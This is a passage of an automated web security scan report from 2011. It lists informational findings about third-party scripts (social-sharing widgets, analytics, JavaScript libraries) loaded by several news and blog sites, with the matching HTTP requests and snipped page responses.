<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</p>

<script type="text/javascript" src="http://twittercounter.com/embed/BadAstronomer/f0a804/000000"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.29. http://blogs.discovermagazine.com/cosmicvariance/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/cosmicvariance/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide
http://digg.com/tools/diggthis.js
http://edge.quantserve.com/quant.js
http://s16.sitemeter.com/js/counter.js?site=s16cosmic
http://w.sharethis.com/button/sharethis.js
http://www.fark.com/js/farkit.js
http://www.google-analytics.com/urchin.js

Request

GET /cosmicvariance/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:04 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:34:52 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/cosmicvariance/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 118893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/cosmicvariance/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s16.sitemeter.com/js/counter.js?site=s16cosmic">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.30. http://blogs.discovermagazine.com/loom/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.discovermagazine.com
Path:	/loom/

Issue detail

The response dynamically includes the following scripts from other domains:

http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide
http://digg.com/tools/diggthis.js
http://edge.quantserve.com/quant.js
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/carlzimmer.json?callback=twitterCallback2&count=5
http://w.sharethis.com/button/sharethis.js
http://www.fark.com/js/farkit.js
http://www.google-analytics.com/urchin.js

Request

GET /loom/ HTTP/1.1
Host: blogs.discovermagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:05 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.16
Last-Modified: Sun, 30 Jan 2011 01:53:08 GMT
Vary: Cookie,Accept-Encoding,User-Agent
X-Pingback: http://blogs.discovermagazine.com/loom/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 151314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

...[SNIP]...
<link rel="stylesheet" type="text/css" media="screen" href="http://blogs.discovermagazine.com/loom/wp-content/themes/discover/css/Quills.css" />
<script type="text/javascript" src="http://www.fark.com/js/farkit.js"></script>
...[SNIP]...
<meta name="generator" content="WordPress 3.0.3" />
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
<span style="display: none">
<script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=21c867cf-4a37-40e1-a039-436f5a1aec9e&type=wordpress&buttonText=."></script>
...[SNIP]...
</script>
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://cdn.stumble-upon.com/js/partner/discovermagazine.com/badge.js/shortwide" type="text/javascript"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/carlzimmer.json?callback=twitterCallback2&count=5"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.msdn.com
Path:	/b/delay/archive/2011/01/27/sudo-localize-amp-amp-make-me-a-sandwich-free-pseudolocalizer-class-makes-it-easy-for-anyone-to-identify-potential-localization-issues-in-net-applications.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.bing.com/bootstrap.js?market=en-US&ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady

Request

Response

23.32. http://blogs.nature.com/news/thegreatbeyond/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.nature.com
Path:	/news/thegreatbeyond/

Issue detail

The response dynamically includes the following scripts from other domains:

http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html
http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html

Request

GET /news/thegreatbeyond/ HTTP/1.1
Host: blogs.nature.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:06:06 GMT
Server: Apache/2.2.3 (Red Hat)
Accept-Ranges: bytes
Cache-Control: max-age=0
Expires: Sun, 30 Jan 2011 02:06:06 GMT
Content-Length: 95929
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" id="sixapart-standard">
<head>

...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/duke_cancer_trials_allegedly_l_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/gates_uk_government_pledge_to.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/un_secretary_general_to_quit_c.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/lhc_will_run_to_end_of_2012.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/letters_to_congress_confirm_fa.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/biology_teachers_often_dismiss.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/missing_nerve_agent_caused_arm.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/vaccination_could_control_chol_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/picture_post_world_map_of_scie_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/nih_shores_up_plan_to_axe_reso.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/no_link_found_between_abortion_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/corruption_at_the_global_fund_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</p>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html" type="text/javascript" charset="utf-8"></script>

<script src="http://feeds.feedburner.com/~s/news/rss/the_great_beyond_with_comments?i=http://blogs.nature.com/news/thegreatbeyond/2011/01/new_house_science_committee_ro_1.html" type="text/javascript" charset="utf-8"></script>
...[SNIP]...

23.33. http://bodyodd.msnbc.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bodyodd.msnbc.msn.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/4639ed5cc4939229aab8af2f9c2f54ca70283148.js?v=23247
http://www.polls.newsvine.com/_static/js/743c08193910d885a9007779422ad8078db6dc9c.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

GET / HTTP/1.1
Host: bodyodd.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.34. http://boyle.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://boyle.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: boyle.newsvine.com
Accept: */*
Accept-Language: en
